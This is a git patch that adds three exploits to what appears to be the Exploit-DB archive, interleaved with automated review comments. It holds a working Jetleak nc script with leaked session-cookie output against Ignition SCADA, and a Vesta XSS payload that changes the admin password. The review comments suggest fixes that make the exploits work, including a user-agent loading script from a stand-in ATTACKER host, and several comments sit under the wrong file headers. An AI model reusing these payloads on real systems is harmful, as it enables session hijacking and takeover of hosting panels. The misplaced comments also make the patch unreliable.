From f48dc1ccea5c588a40e23826d1f5ac45ed565272 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 19 Feb 2016 05:01:53 +0000
Subject: [PATCH] DB: 2016-02-19 3 new exploits

---
files.csv | 3 +
platforms/multiple/remote/39455.txt | 150 ++++++++++++++++++++++++++++
platforms/php/webapps/39468.txt | 42 ++++++++
platforms/php/webapps/39469.txt | 54 ++++++++++
4 files changed, 249 insertions(+)
create mode 100755 platforms/multiple/remote/39455.txt
create mode 100755 platforms/php/webapps/39468.txt
create mode 100755 platforms/php/webapps/39469.txt

diff --git a/files.csv b/files.csv
index cf6cf6586..adae956a4 100755
--- a/files.csv
+++ b/files.csv
@@ -35514,6 +35514,7 @@ id,file,description,date,author,platform,type,port
 39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - CSRF Vulnerabilities",2016-01-18,hyp3rlinx,php,webapps,80
 39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent XSS Vulnerabilities",2016-01-18,hyp3rlinx,php,webapps,80
 39263,platforms/php/webapps/39263.txt,"Advanced Electron Forum 1.0.9 - RFI / CSRF Vulnerability",2016-01-18,hyp3rlinx,php,webapps,80
+39455,platforms/multiple/remote/39455.txt,"Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers",2016-02-17,LiquidWorm,multiple,remote,0
 39371,platforms/osx/dos/39371.c,"OS X - IOBluetoothHCIPacketLogUserClient Memory Corruption",2016-01-28,"Google Security Research",osx,dos,0
 39372,platforms/osx/dos/39372.c,"OS X - IOBluetoothHCIUserClient Arbitrary Kernel Code Execution",2016-01-28,"Google Security Research",osx,dos,0
 39266,platforms/php/webapps/39266.txt,"SeaWell Networks Spectrum - Multiple Vulnerabilities",2016-01-18,"Karn Ganeshen",php,webapps,443
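Review bot: The new 39455 row records port 0 while the advisory it indexes drives `nc localhost 8088` and sends `Host: localhost:8088`, so the port column disagrees with the PoC; if 0 is this index's convention for "unspecified" that is fine, otherwise `...,multiple,remote,8088` would let readers filter on the Ignition gateway port. The row is also inserted between 39263 and 39371 instead of between 39454 and 39456 in the second hunk, where its id belongs, which makes the file's ordering harder to audit.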
@@ -35696,3 +35697,5 @@ id,file,description,date,author,platform,type,port
 39454,platforms/linux/dos/39454.txt,"glibc - getaddrinfo Stack-Based Buffer Overflow",2016-02-16,"Google Security Research",linux,dos,0
 39456,platforms/multiple/webapps/39456.rb,"JMX2 Email Tester - (save_email.php) Web Shell Upload",2016-02-17,HaHwul,multiple,webapps,0
 39459,platforms/php/webapps/39459.txt,"Redaxo CMS 5.0.0 - Multiple Vulnerabilities",2016-02-17,"LSE Leading Security Experts GmbH",php,webapps,80
+39468,platforms/php/webapps/39468.txt,"Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0
+39469,platforms/php/webapps/39469.txt,"DirectAdmin 1.491 - CSRF Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0
diff --git a/platforms/multiple/remote/39455.txt b/platforms/multiple/remote/39455.txt
new file mode 100755
index 000000000..c115a7ead
--- /dev/null
+++ b/platforms/multiple/remote/39455.txt
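Review bot: The 39469 row describes "DirectAdmin 1.491" while the advisory header in 39469.txt claims `# Version : >=1.491`, an open-ended range; the index and the advisory should agree, and since the advisory is dated 27-10-2014 and names only 1.491 as tested, the row's narrower claim is the one to keep and the advisory text is what should be corrected. The 39468 row likewise records port 0 although the Vesta advisory it indexes targets `http(s)://victim:8083/`; if 0 is not this index's "unspecified" convention, `8083` is the value a searcher would expect.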
@@ -0,0 +1,150 @@
+Inductive Automation Ignition 7.8.1 Remote Leakage Of Shared Buffers
+Vendor: Inductive Automation
+Product web page: http://www.inductiveautomation.com
+Affected version: 7.8.1 (b2016012216) and 7.8.0 (b2015101414)
+Platform: Java
+
+Summary: Ignition is a powerful industrial application platform with
+fully integrated development tools for building SCADA, MES, and IIoT
+solutions.
+
+Desc: Remote unauthenticated atackers are able to read arbitrary data
+from other HTTP sessions because Ignition uses a vulnerable Jetty server.
+When the Jetty web server receives a HTTP request, the below code is used
+to parse through the HTTP headers and their associated values. The server
+begins by looping through each character for a given header value and checks
+the following:
+
+- On Line 1164, the server checks if the character is printable ASCII or
+not a valid ASCII character.
+- On Line 1172, the server checks if the character is a space or tab.
+- On Line 1175, the server checks if the character is a line feed.
+- If the character is non-printable ASCII (or less than 0x20), then all
+of the checks above are skipped over and the code throws an ëIllegalCharacterí
+exception on line 1186, passing in the illegal character and a shared buffer.
+
+
+---------------------------------------------------------------------------
+File: jetty-http\src\main\java\org\eclipse\jetty\http\HttpParser.java
+---------------------------------------------------------------------------
+920: protected boolean parseHeaders(ByteBuffer buffer)
+921: {
+[..snip..]
+1163: case HEADER_VALUE:
+1164: if (ch>HttpTokens.SPACE || ch<0)
+1165: {
+1166: _string.append((char)(0xff&ch));
+1167: _length=_string.length();
+1168: setState(State.HEADER_IN_VALUE);
+1169: break;
+1170: }
+1171:
+1172: if (ch==HttpTokens.SPACE || ch==HttpTokens.TAB)
+1173: break;
+1174:
+1175: if (ch==HttpTokens.LINE_FEED)
+1176: {
+1177: if (_length > 0)
+1178: {
+1179: _value=null;
+1180: _valueString=(_valueString==null)?takeString():(_valueString+" "+takeString());
+1181: }
+1182: setState(State.HEADER);
+1183: break;
+1184: }
+1185:
+1186: throw new IllegalCharacter(ch,buffer);
+---------------------------------------------------------------------------
+
+
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+ Microsoft Windows 7 Ultimate SP1 (EN)
+ Ubuntu Linux 14.04
+ Mac OS X
+ HP-UX Itanium
+ Jetty(9.2.z-SNAPSHOT)
+ Java/1.8.0_73
+ Java/1.8.0_66
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+ @zeroscience
+
+
+Advisory ID: ZSL-2016-5306
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5306.php
+
+CVE: CVE-2015-2080
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2080
+
+Original: http://blog.gdssecurity.com/labs/2015/2/25/jetleak-vulnerability-remote-leakage-of-shared-buffers-in-je.html
+Jetleak Test script: https://github.com/GDSSecurity/Jetleak-Testing-Script/blob/master/jetleak_tester.py
+Eclipse: http://git.eclipse.org/c/jetty/org.eclipse.jetty.project.git/plain/advisories/2015-02-24-httpparser-error-buffer-bleed.md
+ https://github.com/eclipse/jetty.project/blob/jetty-9.2.x/advisories/2015-02-24-httpparser-error-buffer-bleed.md
+
+
+14.01.2016
+
+---
+
+
+#######################
+#!/bin/bash
+
+#RESOURCEPATH="/main/web/config/alarming.schedule?4674-1.IBehaviorListener.0-demo"
+RESOURCEPATH="/main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo"
+BAD=$'\a'
+
+function normalRequest {
+echo "-- Normal Request --"
+
+nc localhost 8088 << NORMREQ
+POST $RESOURCEPATH HTTP/1.1
+Host: 
localhost
+Content-Type: application/x-www-form-urlencoded;charset=utf-8
+Connection: close
+Content-Length: 63
+
+NORMREQ
+}
+
+function badCookie {
+echo "-- Bad Cookie --"
+
+nc localhost 8088 << BADCOOKIE
+GET $RESOURCEPATH HTTP/1.1
+Host: localhost
+Coo${BAD}kie: ${BAD}
+
+BADCOOKIE
+}
+
+normalRequest
+echo ""
+echo ""
+badCookie
+
+#######################
+
+
+
+Original raw analysis request via proxy using Referer:
+------------------------------------------------------
+
+GET /main/web/config/conf.modules?51461-4.IBehaviorListener.0-demo&_=1452849939485 HTTP/1.1
+Host: localhost:8088
+Accept: application/xml, text/xml, */*; q=0.01
+X-Requested-With: XMLHttpRequest
+Wicket-Ajax: true
+User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.106 Safari/537.36
+Wicket-Ajax-BaseURL: config/conf.modules?51461
+Referer: \x00
+
+
+Response leaking part of Cookie session:
+----------------------------------------
+
+HTTP/1.1 400 Illegal character 0x0 in state=HEADER_VALUE in 'GET /main/web/con...461\r\nReferer: \x00<<<\r\nAccept-Encoding...tion: close\r\n\r\n>>>SESSIONID=15iwe0g...\x0fCU\xFa\xBf\xA4j\x12\x83\xCb\xE61~S\xD1'
+Content-Length: 0
+Connection: close
+Server: Jetty(9.2.z-SNAPSHOT)
diff --git a/platforms/php/webapps/39468.txt b/platforms/php/webapps/39468.txt
new file mode 100755
index 000000000..f4e2f3369
--- /dev/null
+++ b/platforms/php/webapps/39468.txt
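Review bot: In `normalRequest` the heredoc declares `Content-Length: 63` but ends at the blank line, so no POST body is ever sent; Jetty will keep waiting for the 63 bytes and `nc` will hold the connection open until the server's idle timeout before the script ever reaches `badCookie`. Unless the 63-byte form body was deliberately redacted, either restore it or send the priming request without one (`Content-Length: 0`), since the sample response at the bottom suggests the leak comes from header bytes left in the shared parser buffer (`>>>SESSIONID=...`) rather than from a body. Two things a reader also needs stated: `RESOURCEPATH` embeds a Wicket page id (`51461-4.IBehaviorListener.0-demo`) captured from one session and is unlikely to resolve on another gateway, and the advisory gives no `Fix:` line even though the linked Eclipse advisory names the patched Jetty line — spelling out that the leaked `SESSIONID` enables session hijack, and which Jetty/Ignition build closes it, would make impact and remediation explicit.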
@@ -0,0 +1,42 @@
+# Exploit Title     :Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability
+# Vendor Homepage   :http://www.vestacp.com
+# Version           :0.9.8-15
+# Exploit Author    :Necmettin COSKUN @babayarisi 
+# Blog              :http://ha.cker.io
+# Discovery date    :16/02/2016
+# Tested on :Fedora23 - Chrome/Firefox/Maxthon
+
+We can use user-agent information to attack website like this.
+First of all we change our user-agent and add some dangerous javascript code ( XSS etc. )
+and then we request to one of the website on target server then it is saved on access.log by server
+so when Administrator reads it the javascript code works that we added our user-agent information.
+
+Poc Exploit
+================
+1.Prepare evil js file
+
+function csrfWithToken(url,hanimisToken,password){
+ $.get(url, function(gelen) {
+ $('body').append($(gelen));
+ $('form[id="vstobjects"]').css("display","none");
+ var token = $(hanimisToken).attr("token");
+ $('form[id="vstobjects"]').attr("action",url);
+ $('input[name="v_password"]').val(password);
+ $('form[id="vstobjects"]').submit();
+ });
+};
+//password = 1234567
+csrfWithToken("/edit/user/?user=admin","#token","123456");
+
+2. Make a Get request with evil user-agent to victim server
+
+wget --header="Accept: text/html" --user-agent="" http://victimserver
+
+3. We wait Administrator to read access.log that injected our evil.js
+4. We log-in VestaCP via password we changed
+http(s)://victim:8083/
+  
+  
+Discovered by:
+================
+Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!
\ No newline at end of file
diff --git a/platforms/php/webapps/39469.txt b/platforms/php/webapps/39469.txt
new file mode 100755
index 000000000..39e1d46fe
--- /dev/null
+++ b/platforms/php/webapps/39469.txt
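Review bot: Step 2's `--user-agent=""` is empty, so the PoC as committed injects nothing into access.log; the loader for the evil.js prepared in step 1 (presumably a `<script src=…>` tag that was stripped as HTML when the advisory was imported) has to be restored, e.g. `--user-agent='<script src="http://ATTACKER/evil.js"></script>'`, or the file is not reproducible. The payload's comment `//password = 1234567` also disagrees with the `"123456"` actually passed to `csrfWithToken`, and the script silently relies on jQuery (`$`) being loaded in the admin's log-viewer page, which should be stated as a precondition. The root cause — the panel rendering access.log entries without HTML-escaping — and any fixed release are not named; a one-line mitigation (escape log output on display / upgrade past 0.9.8-15 once a fix exists) would round out the advisory.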
@@ -0,0 +1,54 @@
+
+=============================================================================
+# Title : DirectAdmin (1.491) CSRF Vulnerability
+# Date : 27-10-2014 updated 18-02-2016
+# Version : >=1.491
+# Author : Necmettin COSKUN =>@babayarisi
+# Blog    :http://ha.cker.io
+# Vendor : http://www.directadmin.com/
+# Download: http://www.directadmin.com/demo.html
+=============================================================================
+# info : DirectAdmin is a web-based hosting control panel.
+
+#As you can see original form doesn't include csrf protection or any secret token.
+
+
+Username:
+E-Mail:
+Enter Password:
+Re-Enter Password:
+Send Email Notification: Edit Admin Message
+
+
+
+
+
+
+#POC
+
+
+POC
+
+
+
+
+
+
+
+#POC
+
+# don't be evil!
+Discovered by:
+================
+Necmettin COSKUN  |GrisapkaGuvenlikGrubu|4ewa2getha!
\ No newline at end of file
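Review bot: Both the "original form" and the `#POC` section are empty in the committed file — only the field labels (`Username:`, `E-Mail:`, `Enter Password:` …) and runs of blank lines survive, which looks like the `<form>` markup was stripped on import, so the CSRF proof-of-concept cannot be reproduced from this text and the hunk's declared 54 lines appear to exceed what is actually present. The advisory should be re-imported with the form intact (target URL, method and field names) or with the HTML escaped, and the `#POC` block should at minimum state which request the attacker-controlled page replays. `# Version : >=1.491` also asserts an open-ended affected range that the 27-10-2014 discovery date and the index entry "DirectAdmin 1.491" do not support; name the version actually tested and, if known, the release that added a CSRF token.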